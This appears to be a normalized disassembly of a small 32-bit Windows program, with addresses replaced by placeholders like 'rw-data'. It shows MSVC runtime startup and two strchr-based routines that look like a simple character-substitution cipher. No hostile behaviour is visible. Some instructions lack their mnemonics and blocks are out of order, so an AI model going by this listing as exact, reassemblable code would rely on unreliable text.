jl r-xdata
pop edi
pop esi
pop ebp
mov al 0x1
pop ebx
retn
mov edx [ ebx ]
mov esi [ strncat@IAT ]
push 0x1
push rw-data
push edx
call esi
mov edi ebp
or ecx 0xffffffff
xor eax eax
[ edi ]
mov eax [ ebx ]
not ecx
dec ecx
push ecx
push ebp
push eax
call esi
add esp 0x18
sub_4022a0
mov edx [ esp + 0x4 ]
sub esp 0x8
or ecx 0xffffffff
xor eax eax
push edi
mov edi edx
[ edi ]
mov eax [ esp + 0x18 ]
not ecx
dec ecx
dec eax
cmp eax ecx
jge r-xdata
mov edi rw-data
or ecx 0xffffffff
xor eax eax
[ edi ]
not ecx
dec ecx
mov edi rw-data
mov [ esp + 0x4 ] ecx
or ecx 0xffffffff
[ edi ]
not ecx
dec ecx
mov edi edx
mov [ esp + 0x18 ] ecx
or ecx 0xffffffff
[ edi ]
not ecx
dec ecx
xor edi edi
test ecx ecx
mov [ esp + 0x8 ] ecx
jle r-xdata
xor eax eax
pop edi
add esp 0x8
retn
mov edx [ esp + 0x14 ]
mov eax edi
mov [ edi + edx ] 0x0
pop edi
add esp 0x8
retn
mov ecx [ esp + 0x14 ]
mov eax edx
push ebx
sub eax ecx
push ebp
mov ebp [ strchr@IAT ]
push esi
mov [ esp + 0x1c ] eax
jmp r-xdata
mov ecx [ esp + 0x20 ]
lea ebx [ edi + ecx ]
movsx edx [ eax + ebx ]
push edx
push rw-data
call ebp
mov esi eax
mov eax edi
cdq
idiv [ esp + 0x2c ]
sub esi rw-data
movsx eax [ edx + rw-data ]
push eax
push rw-data
call ebp
sub esi rw-data
add esp 0x10
add eax esi
cdq
idiv [ esp + 0x10 ]
mov eax [ esp + 0x14 ]
inc edi
cmp edi eax
mov cl [ edx + rw-data ]
mov [ ebx ] cl
jl r-xdata
mov eax [ esp + 0x1c ]
pop esi
pop ebp
pop ebx
sub_402380
push ecx
mov edx [ esp + 0x8 ]
push edi
mov edi edx
or ecx 0xffffffff
xor eax eax
[ edi ]
mov eax [ esp + 0x14 ]
not ecx
dec ecx
dec eax
cmp eax ecx
jge r-xdata
mov edi rw-data
or ecx 0xffffffff
xor eax eax
push ebp
[ edi ]
not ecx
dec ecx
mov edi rw-data
mov ebp ecx
or ecx 0xffffffff
[ edi ]
not ecx
dec ecx
mov edi edx
mov [ esp + 0x18 ] ecx
or ecx 0xffffffff
[ edi ]
not ecx
push esi
dec ecx
xor esi esi
mov [ esp + 0xc ] ecx
test ecx ecx
jle r-xdata
xor eax eax
pop edi
pop ecx
retn
mov eax [ esp + 0x18 ]
mov [ esi + eax ] 0x0
mov eax esi
pop esi
pop ebp
pop edi
pop ecx
retn
mov ecx [ esp + 0x18 ]
mov eax edx
sub eax ecx
push ebx
mov [ esp + 0x18 ] eax
jmp r-xdata
mov ecx [ esp + 0x1c ]
lea ebx [ esi + ecx ]
movsx edx [ eax + ebx ]
push edx
push rw-data
call [ strchr@IAT ]
mov edi eax
mov eax esi
cdq
idiv [ esp + 0x28 ]
sub edi rw-data
movsx eax [ edx + rw-data ]
push eax
push rw-data
call [ strchr@IAT ]
lea ecx [ edi + ebp + rw-data ]
add esp 0x10
sub ecx eax
mov eax ecx
cdq
idiv ebp
mov eax [ esp + 0x10 ]
inc esi
cmp esi eax
mov dl [ edx + rw-data ]
mov [ ebx ] dl
jl r-xdata
mov eax [ esp + 0x18 ]
pop ebx
_start
push ebp
mov ebp esp
push 0xffffffff
push r--data
push _except_handler3
mov eax [ fs : 0x0 ]
push eax
mov [ fs : 0x0 ] esp
sub esp 0x68
push ebx
push esi
push edi
mov [ ebp - 0x18 ] esp
xor ebx ebx
mov [ ebp - 0x4 ] ebx
push 0x2
call [ __set_app_type@IAT ]
pop ecx
or [ rw-data ] 0xffffffff
or [ rw-data ] 0xffffffff
call [ __p__fmode@IAT ]
mov ecx [ rw-data ]
mov [ eax ] ecx
call [ __p__commode@IAT ]
mov ecx [ rw-data ]
mov [ eax ] ecx
mov eax [ _adjust_fdiv@IAT ]
mov eax [ eax ]
mov [ rw-data ] eax
call sub_4025eb
cmp [ rw-data ] ebx
jne r-xdata
call sub_4025d6
push rw-data
push rw-data
call _initterm
mov eax [ rw-data ]
mov [ ebp - 0x6c ] eax
lea eax [ ebp - 0x6c ]
push eax
push [ rw-data ]
lea eax [ ebp - 0x64 ]
push eax
lea eax [ ebp - 0x70 ]
push eax
lea eax [ ebp - 0x60 ]
push eax
call [ __getmainargs@IAT ]
push rw-data
push rw-data
call _initterm
add esp 0x24
mov eax [ _acmdln@IAT ]
mov esi [ eax ]
mov [ ebp - 0x74 ] esi
cmp [ esi ] 0x22
jne r-xdata
push sub_4025e8
call [ __setusermatherr@IAT ]
pop ecx
cmp [ esi ] 0x20
jbe r-xdata
inc esi
mov [ ebp - 0x74 ] esi
mov al [ esi ]
cmp al bl
je r-xdata
mov al [ esi ]
cmp al bl
je r-xdata
inc esi
mov [ ebp - 0x74 ] esi
jmp r-xdata
cmp [ esi ] 0x22
jne r-xdata
cmp al 0x22
jne r-xdata
mov [ ebp - 0x30 ] ebx
lea eax [ ebp - 0x5c ]
push eax
call [ GetStartupInfoA@IAT ]
test [ ebp - 0x30 ] 0x1
je r-xdata
cmp al 0x20
jbe r-xdata
inc esi
mov [ ebp - 0x74 ] esi
push 0xa
pop eax
movzx eax [ ebp - 0x2c ]
jmp r-xdata
push eax
push esi
push ebx
push ebx
call [ GetModuleHandleA@IAT ]
push eax
call sub_4019a0
??3@YAXPAX@Z
jmp [ operator delete@IAT ]
??2@YAPAXI@Z
jmp [ operator new@IAT ]
_XcptFilter
jmp [ _XcptFilter@IAT ]
_initterm
jmp [ _initterm@IAT ]
sub_4025d6
push 0x30000
push 0x10000
call _controlfp
pop ecx
pop ecx
retn
sub_4025e8
xor eax eax
retn
sub_4025eb
retn
_except_handler3
jmp [ _except_handler3@IAT ]
_controlfp
jmp [ _controlfp@IAT ]
